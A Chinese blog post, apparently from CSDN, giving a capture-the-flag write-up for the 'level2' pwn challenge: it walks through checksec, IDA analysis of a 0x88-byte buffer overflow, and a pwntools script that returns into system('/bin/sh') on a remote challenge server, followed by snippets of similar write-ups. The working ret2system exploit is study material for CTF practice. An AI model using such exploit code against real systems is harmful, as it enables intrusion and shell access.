攻防世界_level2

已于 2022-04-11 08:41:13 修改
阅读量4.3k 收藏 4
点赞数 1
分类专栏: PWN 文章标签: 安全 python
于 2022-04-10 14:17:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rmc131/article/details/123963670
版权

checksec

在这里插入图片描述
checksec后发现开了NX,这就意味着栈中数据没有执行权限,但是可以利用rop这种方法绕过。最近再看蒸米大神的教程
一步一步学 ROP 之 Linux_x86 篇
一步一步学ROP之linux_x64篇

IDA

在这里插入图片描述
在这里插入图片描述

ida发现有个system函数,并在字符串窗口发现bin/sh
虽然学了linux,但还是不大明白这个,搜了一下Shell 教程。echo"Hello World!“就是一个最简单的shell脚本例子,”#!"是约定的标记,后面加所用的shell环境,这里是Bourne Shell(/usr/bin/sh或/bin/sh),实际Bourne Again Shell(/bin/bash)是最常用的。
在这里插入图片描述
找到ststem函数所在地址,_system 0x08048320
并非system 0x0804A038,从main函数直接跳转不会搞错
在这里插入图片描述
"bin/sh"字符串所在地址,0x0804A024
在这里插入图片描述
缓冲区0x88,允许读入0x100,存在缓冲区溢出。

exp

原来这个过程叫“构造rop链”,rop链攻击原理与思路(x86/x64)这个是20年的,算是比较新,没开始细看,大体还不错。
payload组成,参考攻防世界-iyzyi的wp,wp-上传者-iyzy
payload组成: 0x88个缓冲区字符,0x04个覆盖ebp地址的字符,覆写返回地址为system函数(system的栈帧中的ebp),p32(0)填充ebp+4,p32(bin_sh)自然就是system的参数(ebp+8)喽

from pwn import *

p = remote('111.200.241.244',58154)
#  0x88+0x04=0x8c  "bin/sh":0x0804A024  _system:0x08048320
payload = b'a' * 0x8c + p32(0x08048320) + p32(0) + p32(0x0804A024)
p.recvuntil("Input:")
p.send(payload)
p.interactive()

0x8c: 0x88+0x04=0x8c(十六进制),这个0x04是从vulnerable_function中的参数buf得来
p32,p64啥意思?
pwn从入门到放弃第四章——pwntools的基本使用教程pwntools还是要好好学学。
p32 p64:将一个数字转换为字符
u32 u64:将字符转换为数字
或者说p32、p64是打包为二进制,u32、u64是解包为二进制Pwn基础知识笔记
这里的p32是因为程序是32位的,p32(0)是因为_system的r也是要填上的(下面详细解释)
在这里插入图片描述
双击buf可以看到
在这里插入图片描述
拉到底,这里与level0中是相同的,r 是返回的地址,s是保存的寄存器
我的理解是 因为它存在溢出,先将栈填满,再把寄存器填满(这里寄存器就是ebp,eax也是一个寄存器,暂存ebp和buf的地址,然后push进栈)我们通过让这个栈满了
在这里插入图片描述
又因为函数返回要用 r,给 r 赋上咱们想让它到的地方的地址,这里让它返回到_system函数,
在这里插入图片描述
_system函数的 r 也是这样,不过这里的是0,也就是没有要返回的地址,p32(0)可以填充四位,到下面的command 运行shell “bin/sh” ,这样就可以拿到flag
在这里插入图片描述

flag

ls:列出文件和文件夹
cat:显示文件内容
linux基础: Linux基础入门(详细版)
在这里插入图片描述

RICKC131
关注
专栏目录
攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1540
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
攻防世界level2
weixin_43489686的博客
03-30 325
我这种菜鸡就打打这种签到题刷刷存在感吧。。。 32位,基本没啥保护 简单溢出 system函数地址和/bin/sh地址都有了 直接上exp from pwn import * p = remote('111.198.29.45',55216) bin_sh = 0x804A024 system = 0x8048320 payload = 'a'*0x88+'a'*4+p32(syst...
攻防世界-level2
qq_45771413的博客
04-22 363
查看保护 IDA分析 在vulnerable_function里找到了读取溢出: 字符串长度136,读取长度256,读多了。 这里看到了system,以为可以获取shell,结果发现就是个普通的输出字符串……(菜) 寻找敏感权限: 直接查找字符串找到了 system /bin/sh 但是他俩不在一块儿。第一次直接拼接/bin/sh失败 后面尝试在填充buf和ebp后缝合system和/bin/sh,但是一直不成功。 尝试了两个system的内存地址也是如此…… 上网看别人wp,发现真正调用sy
攻防世界 level2
10-04 439
1.题目 2.IDA分析 3.流程分析 流程很简单,输入信息,输出hello world。read函数也存在明显的溢出点。问题是没有找到现成可用的函数cat flag或者调用system函数。因此,只能我们自己构造。 如上图 我们可以获取到system和‘/bin/sh’的地址(注意,/bin/sh在.data段,如果是.rdata段则不能利用,原因还没有找到,可能是因为rdata只读不能执行?知道的读者麻烦评论告知一下~),exp如下: from pwn import...
[攻防世界]level2
逆向萌新的博客
05-31 193
[攻防世界]level2
初学pwn-攻防世界(level0)
天柱的博客
08-27 1031
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1421
学习pwn开始,慢慢来不要急
level0 -- 攻防世界新手题
01-19
来自攻防世界的pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
攻防世界和jarvis oj的level2
CNXBDSa的博客
07-27 434
PS:两者题型完全一样 就不过多解释了!!!!!!!! 首先第一步是运行这个程序看程序是什么 然后使用checksec去查看这个的保护机制和位数 详情请去看大佬总结比较详细 然后放入对应的iDA中查看 ...
攻防世界 level2】
@一个努力学编程的网安小可爱的博客
01-21 2736
攻防世界 level2 优秀题解 exp 脚本 from pwn import* #p=remote("111.200.241.244",58836) p=process("./21") payload=('a'*0x8c).encode()+p32(0x0804845C)+p32(0x0804A024).encode() #payload='a'*(0x8c)+p32(0x804A038)+p32(0)+p32(0x804A024).decode('unicode_escape') p.sendl
攻防世界_pwn_level2(萌新版)
TedLau的博客
02-24 2450
首发于鄙人博客:传送门 0x00 前言 32位,NX enabled 0x10 步骤 0x11 main函数 很明显我们需要去查看vulnerable函数。 0x12 vulnerable函数 在这里我们需要向题目中输入若干内容,又观察到buf的长度为0x88,那么我们便可以构造出0x88长度的无关数据,然后再输入4个长度的垃圾数据以覆盖ebp,然...
【愚公系列】2022年01月 攻防世界-简单题-PWN-002(level2)
热门推荐
时光隧道
01-18 3万+
文章目录一、level2二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level2 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level2 checksec --file=level2 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
攻防世界level2[WriteUP]
如有错误感谢斧正
04-14 333
用checksec、file命令查看文件属性与防护32位小端序二进制文件。
攻防世界 Pwn level2
MrTreebook的博客
07-16 523
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
攻防世界 pwn新手 level2
kwist_jay的博客
06-14 487
这里我们先下载附件,查看一下文件信息: 32位的i386程序,这里我们用IDA32打开,查看main函数的伪代码 顺藤摸瓜找到输入点buf: 这里我们查看buf的栈结构,他只用了0x88字节但是给了100字节的输入空间,明显的栈溢出 最后两位的返回值s是一个4字节的数组,r为程序返回的地址,就是我们要操作的东西 初步的payload可以定为 'a'*0x88+'aaaa'+..... 我们再往下看,做pwn一般就是找到system函数然后运行自己的命令,所以我们找到了_sy...
攻防世界 - pwn - level2
qq726232111的博客
03-16 235
A、程序分析 1、使用了system() 2、read() -> 缓冲区溢出 3、 程序包含/bin/sh命令 B、利用分析 1、read(0,ebp-88h) --> payload ebp-88h --- ebp-1h (88hbyte 填充数据) ebp --- ebp+3h (4byte 填充...
攻防世界 cat_jump
最新发布
04-26
攻防世界是一个以网络安全攻防技术为主题的比赛平台,而"cat_jump"是攻防世界平台上的一道题目或挑战。具体来说,"cat_jump"是一道二进制逆向工程的题目,要求参赛选手通过分析给定的二进制文件,找到其中隐藏的漏洞或者关键信息。 在"cat_jump"这道题目中,可能需要使用逆向工程的技术,如反汇编、调试等,来分析二进制文件的执行流程、寻找关键函数或算法,并最终找到解题的方法或答案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值